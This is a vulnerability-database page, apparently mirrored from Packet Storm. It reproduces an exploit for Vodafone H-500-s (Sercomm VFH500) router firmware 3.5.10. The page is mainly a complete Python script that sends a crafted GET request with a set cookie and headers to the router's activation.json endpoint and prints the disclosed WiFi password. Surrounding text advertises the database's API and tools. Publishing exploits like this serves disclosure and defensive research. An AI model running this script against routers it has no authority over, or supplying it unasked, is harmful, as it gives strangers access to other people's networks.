Lucene search
K

Vodafone H-500-s 3.5.10 WiFi Password Disclosure

🗓️ 05 Jan 2022 00:00:00Reported by Daniel MonzonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 282 Views

Vodafone H-500-s 3.5.10 WiFi Password Disclosure, Sercomm VFH500, GET request vulnerabilit

Code
`# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure  
# Date: 01/01/2022  
# Exploit Author: Daniel Monzón (stark0de)  
# Vendor Homepage: https://www.vodafone.es/  
# Software Link: N/A  
# Version: Firmware version Vodafone-H-500-s-v3.5.10  
# Hardware model: Sercomm VFH500  
  
# The WiFi access point password gets disclosed just by performing a GET request with certain headers  
  
import requests  
import sys  
import json  
if len(sys.argv) != 2:  
print("Usage: python3 vodafone-pass-disclose.py http://IP")  
sys.exit()  
url = sys.argv[1]+"/data/activation.json"  
cookies = {"pageid": "129"}  
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101  
  
Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-  
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-  
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}  
  
req=requests.get(url, headers=headers, cookies=cookies)  
result=json.loads(req.text)[3].get("wifi_password")  
print("[+] The wifi password is: "+result)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2022 00:00Current
7.4High risk
Vulners AI Score7.4
282